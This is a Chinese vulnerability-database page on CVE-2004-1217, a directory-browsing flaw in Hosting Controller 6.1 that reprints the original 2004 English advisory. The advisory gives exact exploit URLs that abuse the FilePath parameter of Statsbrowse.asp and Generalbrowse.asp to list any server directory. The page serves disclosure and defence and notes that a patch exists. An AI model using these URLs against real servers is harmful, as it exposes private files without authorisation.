HostingController 多个信息泄露漏洞-安全小百科

HostingController 多个信息泄露漏洞

漏洞ID	1108323	漏洞类型	未知
发布时间	2004-12-05	更新时间	2005-10-20
CVE编号	CVE-2004-1217	CNNVD-ID	CNNVD-200501-173
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/675
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-173

|漏洞详情

HostingController是一款以同一接口集中管理大量主机任务的应用程序，可运行在MicrosoftWindows操作系统下。HostingController6.1Hotfix1.4版本中存在信息泄露漏洞，其他版本可能也存在同样问题。远程攻击者可利用Statsbrowse.asp或Genralbrowse.asp中的FilePath参数，指定目标路径，从而读取任意目录内容。

|漏洞EXP

Advisory Information
-------------------------

Software Package   	: Hosting Controller
Vendor Homepage    	: http://www.hostingcontroller.com
Platforms          		: Windows based servers
Vulnerable Versions	: All version ( Tested on: v.6.1 Hotfix 1.4 )
Vendor Contacted  	: 12/5/2004
Release Date:      	: 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools
for the Windows Server family platform.
Hosting Controller has a security flaw which allows attackers to browse
any file and any directory on that server.

Details
---------

Vulnerability - Directories Browsing files on the system.
Foolish vulnerability:

1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers
can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:&Opt=3&level=1&upflag=0

2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers
can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to <br/>
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:

Solution
----------

The vender was notified, they have released a patch.
Update Your software

Credits
---------

Discovered on May 6, 2004 by (/) Mouse
[email protected]
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

# milw0rm.com [2004-12-05]

|参考资料

来源:XF
名称:hosting-controller-view-files(18363)
链接:http://xforce.iss.net/xforce/xfdb/18363
来源:BID
名称:11822
链接:http://www.securityfocus.com/bid/11822
来源:BUGTRAQ
名称:20041205HostingController
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110237762807764&w;=2

相关推荐: FreeBSD rc任意目录可删除漏洞

FreeBSD rc任意目录可删除漏洞漏洞ID 1204249 漏洞类型未知发布时间 2002-05-29 更新时间 2005-05-02 CVE编号 CVE-2002-0795 CNNVD-ID CNNVD-200208-185 漏洞平台 N/A CV…

文章版权归作者所有，未经允许请勿转载。

THE END